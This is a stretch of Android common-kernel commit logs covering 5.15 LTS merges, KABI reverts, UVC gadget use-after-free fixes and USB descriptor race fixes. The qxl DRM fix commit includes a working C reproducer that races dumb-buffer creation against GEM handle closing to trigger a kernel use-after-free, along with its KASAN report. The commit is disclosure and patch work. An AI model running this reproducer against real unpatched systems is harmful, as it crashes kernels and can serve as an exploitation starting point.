1 && gpio_int_idx == 0 case tee: amdtee: fix use-after-free vulnerability in amdtee_close_session cgroup: Remove duplicates in cgroup v1 tasks file pinctrl: avoid unsafe code pattern in find_pinctrl() counter: microchip-tcb-capture: Fix the use of internal GCLK logic usb: gadget: udc-xilinx: replace memcpy with memcpy_toio usb: gadget: ncm: Handle decoding of multiple NTB's in unwrap call usb: cdnsp: Fixes issue with dequeuing not queued requests x86/alternatives: Disable KASAN in apply_alternatives() dmaengine: idxd: use spin_lock_irqsave before wait_event_lock_irq dmaengine: mediatek: Fix deadlock caused by synchronize_irq() powerpc/8xx: Fix pte_access_permitted() for PAGE_NONE powerpc/64e: Fix wrong test in __ptep_test_and_clear_young() arm64: report EL1 UNDEFs better arm64: die(): pass 'err' as long arm64: consistently pass ESR_ELx to die() arm64: rework FPAC exception handling arm64: rework BTI exception handling arm64: allow kprobes on EL0 handlers arm64: split EL0/EL1 UNDEF handlers arm64: factor out EL1 SSBS emulation hook arm64: factor insn read out of call_undef_hook() arm64: rework EL0 MRS emulation arm64: armv8_deprecated: fold ops into insn_emulation arm64: armv8_deprecated move emulation functions arm64: armv8_deprecated: move aarch32 helper earlier arm64: armv8_deprecated: rework deprected instruction handling arm64: armv8_deprecated: fix unused-function error Revert "kernel/sched: Modify initial boot task idle setup" usb: hub: Guard against accesses to uninitialized BOS descriptors eth: remove remaining copies of the NAPI_POLL_WEIGHT define Linux 5.15.136 Change-Id: I22c3d347cc5437f0607d0ab0c4ba392a75652d37 Signed-off-by: Greg Kroah-Hartman <[email protected]>
This reverts commit 935a153 which is commit e0a8c918daa58700609ebd45e3fcd49965be8bbc upstream. It breaks the Android KABI and is not needed at this time for any Android-relevant systems. Bug: 161946584 Change-Id: Icc2bb21cc8f1432d765a4fbf279fdcd5ffffd281 Signed-off-by: Greg Kroah-Hartman <[email protected]>
This reverts commit 667fe91 which is commit 0412cc846a1ef38697c3f321f9b174da91ecd3b5 upstream. It breaks the Android KABI and is not needed at this time for any Android-relevant systems. Bug: 161946584 Change-Id: Ie12bd23d4099bec4dfebb062947ef7d1ea299d9b Signed-off-by: Greg Kroah-Hartman <[email protected]>
This reverts commit b9bdffb which is commit e193b7955dfad68035b983a0011f4ef3590c85eb upstream. It breaks the Android KABI and is not needed at this time for any Android-relevant systems. Bug: 161946584 Change-Id: I90b5ec90e1ff0f4285cff3d1e195f0af4e0cda02 Signed-off-by: Greg Kroah-Hartman <[email protected]>
In commit 2e76b4f ("rpmsg: Fix kfree() of static memory on setting driver_override") a pointer was changed to const, which messes with the CRC and ABI checks. As the code is fine if this is left as not-const, just put it back to preserve the abi. Bug: 161946584 Fixes: 2e76b4f ("rpmsg: Fix kfree() of static memory on setting driver_override") Change-Id: I9a87b9cf412191d9872b48f1f876a81df6701de0 Signed-off-by: Greg Kroah-Hartman <[email protected]>
If open request sent to classic fuse, backing_file is null. In fuse_release_initialize, fput will trigger a crash. Bug: 297831741 Signed-off-by: liujing40 <[email protected]> (cherry picked from https://android-review.googlesource.com/q/commit:4d2ff573981f06ba09e1ddda8726bb73ff6a2c3f) Merged-In: I2d54d99d62b54c39a6dc9064f8f62488433aff6f Change-Id: I2d54d99d62b54c39a6dc9064f8f62488433aff6f
Currently the set_alt callback immediately disables the endpoint and queues the v4l2 streamoff event. However, as the streamoff event is processed asynchronously, it is possible that the video_pump thread attempts to queue requests to an already disabled endpoint. This change moves disabling usb endpoint to the end of streamoff event callback. As the endpoint's state can no longer be used, video_pump is now guarded by uvc->state as well. To be consistent with the actual streaming state, uvc->state is now toggled between CONNECTED and STREAMING from the v4l2 event callback only. Link: https://lore.kernel.org/[email protected]/ Link: https://lore.kernel.org/[email protected]/ Reviewed-by: Daniel Scally <[email protected]> Reviewed-by: Michael Grzeschik <[email protected]> Tested-by: Michael Grzeschik <[email protected]> Signed-off-by: Avichal Rakesh <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Greg Kroah-Hartman <[email protected]> Bug: 296925310 (cherry picked from commit 991544dc579b636e69defa3eec486fd6f6191e59 https://kernel.googlesource.com/pub/scm/linux/kernel/git/gregkh/usb usb-next) Change-Id: Ic5631a526e72cbcf299dcb8167bb3d34468d37e9 Signed-off-by: Avichal Rakesh <[email protected]>
Currently, the uvc gadget driver allocates all uvc_requests as one array and deallocates them all when the video stream stops. This includes de-allocating all the usb_requests associated with those uvc_requests. This can lead to use-after-free issues if any of those de-allocated usb_requests were still owned by the usb controller. This patch is 1 of 2 patches addressing the use-after-free issue. Instead of bulk allocating all uvc_requests as an array, this patch allocates uvc_requests one at a time, which should allows for similar granularity when deallocating the uvc_requests. This patch has no functional changes other than allocating each uvc_request separately, and similarly freeing each of them separately. Link: https://lore.kernel.org/[email protected] Reviewed-by: Daniel Scally <[email protected]> Reviewed-by: Michael Grzeschik <[email protected]> Suggested-by: Michael Grzeschik <[email protected]> Tested-by: Michael Grzeschik <[email protected]> Signed-off-by: Avichal Rakesh <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Greg Kroah-Hartman <[email protected]> Bug: 296925310 (cherry picked from commit aeb686a98a9e9743c4c0338957e59643a2708146 https://kernel.googlesource.com/pub/scm/linux/kernel/git/gregkh/usb usb-next) Change-Id: I33400ac6b28e72c6c10805e167e8bab7e2520a28 Signed-off-by: Avichal Rakesh <[email protected]>
This patch refactors the video disable logic in uvcg_video_enable into its own separate function 'uvcg_video_disable'. This function is now used anywhere uvcg_video_enable(video, 0) was used. Reviewed-by: Daniel Scally <[email protected]> Suggested-by: Michael Grzeschik <[email protected]> Signed-off-by: Avichal Rakesh <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Greg Kroah-Hartman <[email protected]> Bug: 296925310 (cherry picked from commit 2079b60bda3257146a4e8ed7525513865f7e6b3e https://kernel.googlesource.com/pub/scm/linux/kernel/git/gregkh/usb usb-next) Change-Id: Ie8934e6fe1577373b01e3c66626e4239cf9f8c83 Signed-off-by: Avichal Rakesh <[email protected]>
Currently, the uvc gadget driver allocates all uvc_requests as one array and deallocates them all when the video stream stops. This includes de-allocating all the usb_requests associated with those uvc_requests. This can lead to use-after-free issues if any of those de-allocated usb_requests were still owned by the usb controller. This is patch 2 of 2 in fixing the use-after-free issue. It adds a new flag to uvc_video to track when frames and requests should be flowing. When disabling the video stream, the flag is tripped and, instead of de-allocating all uvc_requests and usb_requests, the gadget driver only de-allocates those usb_requests that are currently owned by it (as present in req_free). Other usb_requests are left untouched until their completion handler is called which takes care of freeing the usb_request and its corresponding uvc_request. Now that uvc_video does not depends on uvc->state, this patch removes unnecessary upates to uvc->state that were made to accommodate uvc_video logic. This should ensure that uvc gadget driver never accidentally de-allocates a usb_request that it doesn't own. Link: https://lore.kernel.org/[email protected] Reviewed-by: Daniel Scally <[email protected]> Reviewed-by: Michael Grzeschik <[email protected]> Suggested-by: Michael Grzeschik <[email protected]> Tested-by: Michael Grzeschik <[email protected]> Signed-off-by: Avichal Rakesh <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Greg Kroah-Hartman <[email protected]> Bug: 296925310 (cherry picked from commit da324ffce34c521b239f319d4051260444a3eb4a https://kernel.googlesource.com/pub/scm/linux/kernel/git/gregkh/usb usb-next) Change-Id: Ib0378394dc20e894507f60c70f71c579d046cd7a Signed-off-by: Avichal Rakesh <[email protected]>
…uests When we use an async work queue to perform the function of pumping usb requests to the usb controller, it is possible that amongst other factors, thread scheduling affects at what cadence we're able to pump requests. This could mean isoc usb requests miss their uframes - resulting in video stream flickers on the host device. To avoid this, we make the async_wq thread only produce isoc usb_requests with uvc buffers encoded into them. The process of queueing to the endpoint is done by the uvc_video_complete() handler. In case no usb_requests are ready with encoded information, we just queue a zero length request to the endpoint from the complete handler. For bulk endpoints the async_wq thread still queues usb requests to the endpoint. Signed-off-by: Michael Grzeschik <[email protected]> Signed-off-by: Jayant Chowdhary <[email protected]> Suggested-by: Avichal Rakesh <[email protected]> Suggested-by: Alan Stern <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Greg Kroah-Hartman <[email protected]> Bug: 301915972 (cherry picked from commit 6acba0345b68772830582ca1ca369a2f45631275 https://kernel.googlesource.com/pub/scm/linux/kernel/git/gregkh/usb usb-next) Change-Id: I5597cc29e9caec69e4f3575938d7d640857aaa28 Signed-off-by: Avichal Rakesh <[email protected]>
commit c611589b4259ed63b9b77be6872b1ce07ec0ac16 upstream.
qxl_mode_dumb_create() dereferences the qobj returned by
qxl_gem_object_create_with_handle(), but the handle is the only one
holding a reference to it.
A potential attacker could guess the returned handle value and closes it
between the return of qxl_gem_object_create_with_handle() and the qobj
usage, triggering a use-after-free scenario.
Reproducer:
int dri_fd =-1;
struct drm_mode_create_dumb arg = {0};
void gem_close(int handle);
void* trigger(void* ptr)
{
int ret;
arg.width = arg.height = 0x20;
arg.bpp = 32;
ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &arg);
if(ret)
{
perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
exit(-1);
}
gem_close(arg.handle);
while(1) {
struct drm_mode_create_dumb args = {0};
args.width = args.height = 0x20;
args.bpp = 32;
ret = ioctl(dri_fd, DRM_IOCTL_MODE_CREATE_DUMB, &args);
if (ret) {
perror("[*] DRM_IOCTL_MODE_CREATE_DUMB Failed");
exit(-1);
}
printf("[*] DRM_IOCTL_MODE_CREATE_DUMB created, %d\n", args.handle);
gem_close(args.handle);
}
return NULL;
}
void gem_close(int handle)
{
struct drm_gem_close args;
args.handle = handle;
int ret = ioctl(dri_fd, DRM_IOCTL_GEM_CLOSE, &args); // gem close handle
if (!ret)
printf("gem close handle %d\n", args.handle);
}
int main(void)
{
dri_fd= open("/dev/dri/card0", O_RDWR);
printf("fd:%d\n", dri_fd);
if(dri_fd == -1)
return -1;
pthread_t tid1;
if(pthread_create(&tid1,NULL,trigger,NULL)){
perror("[*] thread_create tid1\n");
return -1;
}
while (1)
{
gem_close(arg.handle);
}
return 0;
}
This is a KASAN report:
==================================================================
BUG: KASAN: slab-use-after-free in qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
Write of size 1 at addr ffff88801136c240 by task poc/515
CPU: 1 PID: 515 Comm: poc Not tainted 6.3.0 projectceladon#3
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.0-debian-1.16.0-4 04/01/2014
Call Trace:
<TASK>
__dump_stack linux/lib/dump_stack.c:88
dump_stack_lvl+0x48/0x70 linux/lib/dump_stack.c:106
print_address_description linux/mm/kasan/report.c:319
print_report+0xd2/0x660 linux/mm/kasan/report.c:430
kasan_report+0xd2/0x110 linux/mm/kasan/report.c:536
__asan_report_store1_noabort+0x17/0x30 linux/mm/kasan/report_generic.c:383
qxl_mode_dumb_create+0x3c2/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:69
drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
vfs_ioctl linux/fs/ioctl.c:51
__do_sys_ioctl linux/fs/ioctl.c:870
__se_sys_ioctl linux/fs/ioctl.c:856
__x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
do_syscall_x64 linux/arch/x86/entry/common.c:50
do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
RIP: 0033:0x7ff5004ff5f7
Code: 00 00 00 48 8b 05 99 c8 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 2e 0f 1f 84 00 00 00 00 00 b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 69 c8 0d 00 f7 d8 64 89 01 48
RSP: 002b:00007ff500408ea8 EFLAGS: 00000286 ORIG_RAX: 0000000000000010
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007ff5004ff5f7
RDX: 00007ff500408ec0 RSI: 00000000c02064b2 RDI: 0000000000000003
RBP: 00007ff500408ef0 R08: 0000000000000000 R09: 000000000000002a
R10: 0000000000000000 R11: 0000000000000286 R12: 00007fff1c6cdafe
R13: 00007fff1c6cdaff R14: 00007ff500408fc0 R15: 0000000000802000
</TASK>
Allocated by task 515:
kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
kasan_save_alloc_info+0x1e/0x40 linux/mm/kasan/generic.c:510
____kasan_kmalloc linux/mm/kasan/common.c:374
__kasan_kmalloc+0xc3/0xd0 linux/mm/kasan/common.c:383
kasan_kmalloc linux/./include/linux/kasan.h:196
kmalloc_trace+0x48/0xc0 linux/mm/slab_common.c:1066
kmalloc linux/./include/linux/slab.h:580
kzalloc linux/./include/linux/slab.h:720
qxl_bo_create+0x11a/0x610 linux/drivers/gpu/drm/qxl/qxl_object.c:124
qxl_gem_object_create+0xd9/0x360 linux/drivers/gpu/drm/qxl/qxl_gem.c:58
qxl_gem_object_create_with_handle+0xa1/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:89
qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
vfs_ioctl linux/fs/ioctl.c:51
__do_sys_ioctl linux/fs/ioctl.c:870
__se_sys_ioctl linux/fs/ioctl.c:856
__x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
do_syscall_x64 linux/arch/x86/entry/common.c:50
do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
Freed by task 515:
kasan_save_stack+0x38/0x70 linux/mm/kasan/common.c:45
kasan_set_track+0x25/0x40 linux/mm/kasan/common.c:52
kasan_save_free_info+0x2e/0x60 linux/mm/kasan/generic.c:521
____kasan_slab_free linux/mm/kasan/common.c:236
____kasan_slab_free+0x180/0x1f0 linux/mm/kasan/common.c:200
__kasan_slab_free+0x12/0x30 linux/mm/kasan/common.c:244
kasan_slab_free linux/./include/linux/kasan.h:162
slab_free_hook linux/mm/slub.c:1781
slab_free_freelist_hook+0xd2/0x1a0 linux/mm/slub.c:1807
slab_free linux/mm/slub.c:3787
__kmem_cache_free+0x196/0x2d0 linux/mm/slub.c:3800
kfree+0x78/0x120 linux/mm/slab_common.c:1019
qxl_ttm_bo_destroy+0x140/0x1a0 linux/drivers/gpu/drm/qxl/qxl_object.c:49
ttm_bo_release+0x678/0xa30 linux/drivers/gpu/drm/ttm/ttm_bo.c:381
kref_put linux/./include/linux/kref.h:65
ttm_bo_put+0x50/0x80 linux/drivers/gpu/drm/ttm/ttm_bo.c:393
qxl_gem_object_free+0x3e/0x60 linux/drivers/gpu/drm/qxl/qxl_gem.c:42
drm_gem_object_free+0x5c/0x90 linux/drivers/gpu/drm/drm_gem.c:974
kref_put linux/./include/linux/kref.h:65
__drm_gem_object_put linux/./include/drm/drm_gem.h:431
drm_gem_object_put linux/./include/drm/drm_gem.h:444
qxl_gem_object_create_with_handle+0x151/0x180 linux/drivers/gpu/drm/qxl/qxl_gem.c:100
qxl_mode_dumb_create+0x1cd/0x400 linux/drivers/gpu/drm/qxl/qxl_dumb.c:63
drm_mode_create_dumb linux/drivers/gpu/drm/drm_dumb_buffers.c:96
drm_mode_create_dumb_ioctl+0x1f5/0x2d0 linux/drivers/gpu/drm/drm_dumb_buffers.c:102
drm_ioctl_kernel+0x21d/0x430 linux/drivers/gpu/drm/drm_ioctl.c:788
drm_ioctl+0x56f/0xcc0 linux/drivers/gpu/drm/drm_ioctl.c:891
vfs_ioctl linux/fs/ioctl.c:51
__do_sys_ioctl linux/fs/ioctl.c:870
__se_sys_ioctl linux/fs/ioctl.c:856
__x64_sys_ioctl+0x13d/0x1c0 linux/fs/ioctl.c:856
do_syscall_x64 linux/arch/x86/entry/common.c:50
do_syscall_64+0x5b/0x90 linux/arch/x86/entry/common.c:80
entry_SYSCALL_64_after_hwframe+0x72/0xdc linux/arch/x86/entry/entry_64.S:120
The buggy address belongs to the object at ffff88801136c000
which belongs to the cache kmalloc-1k of size 1024
The buggy address is located 576 bytes inside of
freed 1024-byte region [ffff88801136c000, ffff88801136c400)
The buggy address belongs to the physical page:
page:0000000089fc329b refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x11368
head:0000000089fc329b order:3 entire_mapcount:0 nr_pages_mapped:0 pincount:0
flags: 0xfffffc0010200(slab|head|node=0|zone=1|lastcpupid=0x1fffff)
raw: 000fffffc0010200 ffff888007841dc0 dead000000000122 0000000000000000
raw: 0000000000000000 0000000080100010 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected
Memory state around the buggy address:
ffff88801136c100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
ffff88801136c180: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
>ffff88801136c200: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
^
ffff88801136c280: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
ffff88801136c300: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
==================================================================
Disabling lock debugging due to kernel taint
Instead of returning a weak reference to the qxl_bo object, return the
created drm_gem_object and let the caller decrement the reference count
when it no longer needs it. As a convenience, if the caller is not
interested in the gobj object, it can pass NULL to the parameter and the
reference counting is descremented internally.
The bug and the reproducer were originally found by the Zero Day Initiative project (ZDI-CAN-20940).
Bug: 311571057
Link: https://www.zerodayinitiative.com/
Signed-off-by: Wander Lairson Costa <[email protected]>
Cc: [email protected]
Reviewed-by: Dave Airlie <[email protected]>
Signed-off-by: Dave Airlie <[email protected]>
Link: https://patchwork.freedesktop.org/patch/msgid/[email protected]
Signed-off-by: Greg Kroah-Hartman <[email protected]>
(cherry picked from commit d578c91)
Signed-off-by: Lee Jones <[email protected]>
Change-Id: If0e6ae00dd7e90f938beff9c6992ea37ba7bc4fa
commit 85d07c55621676d47d873d2749b88f783cd4d5a1 upstream. In preparation for reworking the usb_get_device_descriptor() routine, it is desirable to unite the two different code paths responsible for initially determining endpoint 0's maximum packet size in a newly discovered USB device. Making this determination presents a chicken-and-egg sort of problem, in that the only way to learn the maxpacket value is to get it from the device descriptor retrieved from the device, but communicating with the device to retrieve a descriptor requires us to know beforehand the ep0 maxpacket size. In practice this problem is solved in two different ways, referred to in hub.c as the "old scheme" and the "new scheme". The old scheme (which is the approach recommended by the USB-2 spec) involves asking the device to send just the first eight bytes of its device descriptor. Such a transfer uses packets containing no more than eight bytes each, and every USB device must have an ep0 maxpacket size >= 8, so this should succeed. Since the bMaxPacketSize0 field of the device descriptor lies within the first eight bytes, this is all we need. The new scheme is an imitation of the technique used in an early Windows USB implementation, giving it the happy advantage of working with a wide variety of devices (some of them at the time would not work with the old scheme, although that's probably less true now). It involves making an initial guess of the ep0 maxpacket size, asking the device to send up to 64 bytes worth of its device descriptor (which is only 18 bytes long), and then resetting the device to clear any error condition that might have resulted from the guess being wrong. The initial guess is determined by the connection speed; it should be correct in all cases other than full speed, for which the allowed values are 8, 16, 32, and 64 (in this case the initial guess is 64). The reason for this patch is that the old- and new-scheme parts of hub_port_init() use different code paths, one involving usb_get_device_descriptor() and one not, for their initial reads of the device descriptor. Since these reads have essentially the same purpose and are made under essentially the same circumstances, this is illogical. It makes more sense to have both of them use a common subroutine. This subroutine does basically what the new scheme's code did, because that approach is more general than the one used by the old scheme. It only needs to know how many bytes to transfer and whether or not it is being called for the first iteration of a retry loop (in case of certain time-out errors). There are two main differences from the former code: We initialize the bDescriptorType field of the transfer buffer to 0 before performing the transfer, to avoid possibly accessing an uninitialized value afterward. We read the device descriptor into a temporary buffer rather than storing it directly into udev->descriptor, which the old scheme implementation used to do. Since the whole point of this first read of the device descriptor is to determine the bMaxPacketSize0 value, that is what the new routine returns (or an error code). The value is stored in a local variable rather than in udev->descriptor. As a side effect, this necessitates moving a section of code that checks the bcdUSB field for SuperSpeed devices until after the full device descriptor has been retrieved. Bug: 290990909 Signed-off-by: Alan Stern <[email protected]> Cc: Oliver Neukum <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Greg Kroah-Hartman <[email protected]> (cherry picked from commit 56c49a3) Signed-off-by: Lee Jones <[email protected]> Change-Id: I2ffdb9ee11219fca6aeb2cda7867ea53fd6ca61c
commit de28e469da75359a2bb8cd8778b78aa64b1be1f4 upstream. The usb_get_device_descriptor() routine reads the device descriptor from the udev device and stores it directly in udev->descriptor. This interface is error prone, because the USB subsystem expects in-memory copies of a device's descriptors to be immutable once the device has been initialized. The interface is changed so that the device descriptor is left in a kmalloc-ed buffer, not copied into the usb_device structure. A pointer to the buffer is returned to the caller, who is then responsible for kfree-ing it. The corresponding changes needed in the various callers are fairly small. Bug: 290990909 Signed-off-by: Alan Stern <[email protected]> Link: https://lore.kernel.org/r/[email protected] Signed-off-by: Greg Kroah-Hartman <[email protected]> (cherry picked from commit eda9a29) Signed-off-by: Lee Jones <[email protected]> Change-Id: I7c4be5b5dd06f7d5ba8aacad33ecf78f4a3b49e6
…hub_port_init()
commit ff33299ec8bb80cdcc073ad9c506bd79bb2ed20b upstream.
Syzbot reported an out-of-bounds read in sysfs.c:read_descriptors():
BUG: KASAN: slab-out-of-bounds in read_descriptors+0x263/0x280 drivers/usb/core/sysfs.c:883
Read of size 8 at addr ffff88801e78b8c8 by task udevd/5011
CPU: 0 PID: 5011 Comm: udevd Not tainted 6.4.0-rc6-syzkaller-00195-g40f71e7cd3c6 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 05/27/2023
Call Trace:
<TASK>
__dump_stack lib/dump_stack.c:88 [inline]
dump_stack_lvl+0xd9/0x150 lib/dump_stack.c:106
print_address_description.constprop.0+0x2c/0x3c0 mm/kasan/report.c:351
print_report mm/kasan/report.c:462 [inline]
kasan_report+0x11c/0x130 mm/kasan/report.c:572
read_descriptors+0x263/0x280 drivers/usb/core/sysfs.c:883
...
Allocated by task 758:
...
__do_kmalloc_node mm/slab_common.c:966 [inline]
__kmalloc+0x5e/0x190 mm/slab_common.c:979
kmalloc include/linux/slab.h:563 [inline]
kzalloc include/linux/slab.h:680 [inline]
usb_get_configuration+0x1f7/0x5170 drivers/usb/core/config.c:887
usb_enumerate_device drivers/usb/core/hub.c:2407 [inline]
usb_new_device+0x12b0/0x19d0 drivers/usb/core/hub.c:2545
As analyzed by Khazhy Kumykov, the cause of this bug is a race between
read_descriptors() and hub_port_init(): The first routine uses a field
in udev->descriptor, not expecting it to change, while the second
overwrites it.
Prior to commit 45bf39f8df7f ("USB: core: Don't hold device lock while
reading the "descriptors" sysfs file") this race couldn't occur,
because the routines were mutually exclusive thanks to the device
locking. Removing that locking from read_descriptors() exposed it to
the race.
The best way to fix the bug is to keep hub_port_init() from changing
udev->descriptor once udev has been initialized and registered.
Drivers expect the descriptors stored in the kernel to be immutable;
we should not undermine this expectation. In fact, this change should
have been made long ago.
So now hub_port_init() will take an additional argument, specifying a
buffer in which to store the device descriptor it reads. (If udev has
not yet been initialized, the buffer pointer will be NULL and then
hub_port_init() will store the device descriptor in udev as before.)
This eliminates the data race responsible for the out-of-bounds read.
The changes to hub_port_init() appear more extensive than they really
are, because of indentation changes resulting from an attempt to avoid
writing to other parts of the usb_device structure after it has been
initialized. Similar changes should be made to the code that reads
the BOS descriptor, but that can be handled in a separate patch later
on. This patch is sufficient to fix the bug found by syzbot.
Bug: 290990909
Reported-and-tested-by: [email protected]
Closes: https://lore.kernel.org/linux-usb/[email protected]/#r
Signed-off-by: Alan Stern <[email protected]>
Cc: Khazhy Kumykov <[email protected]>
Fixes: 45bf39f8df7f ("USB: core: Don't hold device lock while reading the "descriptors" sysfs file")
Cc: [email protected]
Link: https://lore.kernel.org/r/[email protected]
Signed-off-by: Greg Kroah-Hartman <[email protected]>
(cherry picked from commit 7fe9d87)
Signed-off-by: Lee Jones <[email protected]>
Change-Id: Ia5e4a65cd5d895bf0d85a5aa5efa1c4d1368d069
This merges up to the 5.15.137 LTS release into android13-5.15.
It includes the following commits:
* 61cfd264993d Revert "ipv4/fib: send notify when delete source address routes"
* 96e78d17ff32 Revert "perf: Disallow mis-matched inherited group reads"
* 0e202e52c706 Revert "xfrm: fix a data-race in xfrm_gen_index()"
* 1706e8a9deb3 Revert "Bluetooth: hci_core: Fix build warnings"
* ca21a66652be Revert "xfrm: interface: use DEV_STATS_INC()"
* ea135f6ae66a ANDROID: GKI: arm64: drop CONFIG_DEBUG_PREEMPT forced disable
* a7c5fe8e7b29 Merge 5.15.137 into android13-5.15-lts
|\
| * 12952a23a5da Linux 5.15.137
| * dff33880d40a xfrm6: fix inet6_dev refcount underflow problem
| * 5a9d05a4f1c3 Bluetooth: hci_sock: Correctly bounds check and pad HCI_MON_NEW_INDEX name
| * a6df96ee0b45 Bluetooth: hci_sock: fix slab oob read in create_monitor_event
| * c08d609fb2b6 phy: mapphone-mdm6600: Fix pinctrl_pm handling for sleep pins
| * e1b030b101f6 phy: mapphone-mdm6600: Fix runtime PM for remove
| * 59f1095ab58e phy: mapphone-mdm6600: Fix runtime disable on probe
| * b618062c0b13 serial: 8250: omap: Move uart_write() inside PM section
| * 67f29cd2f851 ASoC: pxa: fix a memory leak in probe()
| * 76d04c339508 gpio: vf610: set value before the direction to avoid a glitch
| * 4b129e3964b3 platform/x86: asus-wmi: Map 0x2a code, Ignore 0x2b and 0x2c events
| * e1a058cc2467 platform/x86: asus-wmi: Change ASUS_WMI_BRN_DOWN code from 0x20 to 0x2e
| * c6bbe51dcdf3 platform/surface: platform_profile: Propagate error if profile registration fails
| * a73c8d716938 s390/cio: fix a memleak in css_alloc_subchannel
| * c8b6c2df1e7d selftests/ftrace: Add new test case which checks non unique symbol
| * 3ad81e6affcb s390/pci: fix iommu bitmap allocation
| * 71d224acc4d1 perf: Disallow mis-matched inherited group reads
| * 5aa89a11a2a6 USB: serial: option: add Fibocom to DELL custom modem FM101R-GL
| * 8c376d863618 USB: serial: option: add entry for Sierra EM9191 with new firmware
| * 483221216176 USB: serial: option: add Telit LE910C4-WWX 0x1035 composition
| * e750fb71dc6a nvme-rdma: do not try to stop unallocated queues
| * a9fd6d44abbc nvme-pci: add BOGUS_NID for Intel 0a54 device
| * 071382bda1da ACPI: irq: Fix incorrect return value in acpi_register_gsi()
| * 431a5010bce2 NFSv4.1: fixup use EXCHGID4_FLAG_USE_PNFS_DS for DS server
| * 5762e72ef1b0 pNFS: Fix a hang in nfs4_evict_inode()
| * 5a3abee2eee9 Revert "pinctrl: avoid unsafe code pattern in find_pinctrl()"
| * 24959825377f mmc: core: Capture correct oemid-bits for eMMC cards
| * 8041e7b7e7e9 mmc: core: sdio: hold retuning if sdio in 1-bit mode
| * 262029c0c58c mmc: mtk-sd: Use readl_poll_timeout_atomic in msdc_reset_hw
| * 3e363db1c13a mtd: physmap-core: Restore map_rom fallback
| * 71823463b1b2 mtd: spinand: micron: correct bitmask for ecc status
| * a50d2f17d562 mtd: rawnand: arasan: Ensure program page operations are successful
| * ae53c92e928c mtd: rawnand: marvell: Ensure program page operations are successful
| * c0ca2ab23098 mtd: rawnand: pl353: Ensure program page operations are successful
| * a7070628043e mtd: rawnand: qcom: Unmap the right resource upon probe failure
| * 3f928d1362f7 net: fix ifname in netlink ntf during netns move
| * ac43ec299a6f net: move from strlcpy with unused retval to strscpy
| * 30e2db403032 net: introduce a function to check if a netdev name is in use
| * 38ba5479355b Bluetooth: hci_event: Fix using memcmp when comparing keys
| * 3b2da6d62b42 net/mlx5: Handle fw tracer change ownership event based on MTRC
| * f6e263824539 platform/x86: touchscreen_dmi: Add info for the Positivo C4128B
| * ca56d8afe648 HID: multitouch: Add required quirk for Synaptics 0xcd7e device
| * ca5bec7ecf26 btrfs: error out when reallocating block for defrag using a stale transaction
| * 2692fd37aaf4 btrfs: error when COWing block from a root that is being deleted
| * ef491d9560d9 btrfs: error out when COWing block using a stale transaction
| * f89ed0a09673 btrfs: fix some -Wmaybe-uninitialized warnings in ioctl.c
| * df486b75feca drm: panel-orientation-quirks: Add quirk for One Mix 2S
| * d5ba30ee4f6d ipv4/fib: send notify when delete source address routes
| * 9d07b7abd277 sky2: Make sure there is at least one frag_addr available
| * f652eb4adf27 regulator/core: Revert "fix kobject release warning and memory leak in regulator_register()"
| * aa77b187b1f0 wifi: cfg80211: avoid leaking stack data into trace
| * 30a2285a2e18 wifi: mac80211: allow transmitting EAPOL frames with tainted key
| * b64eb31a1b53 wifi: cfg80211: Fix 6GHz scan configuration
| * bbec1724519e Bluetooth: hci_core: Fix build warnings
| * 02b0e6991838 Bluetooth: Avoid redundant authentication
| * 38681af225b6 Bluetooth: btusb: add shutdown function for QCA6174
| * e6e9a32c3e60 HID: holtek: fix slab-out-of-bounds Write in holtek_kbd_input_event
| * 06aabf7715da wifi: iwlwifi: Ensure ack flag is properly cleared.
| * 6063f6f64fa4 wifi: mwifiex: Sanity check tlv_len and tlv_bitmap_len
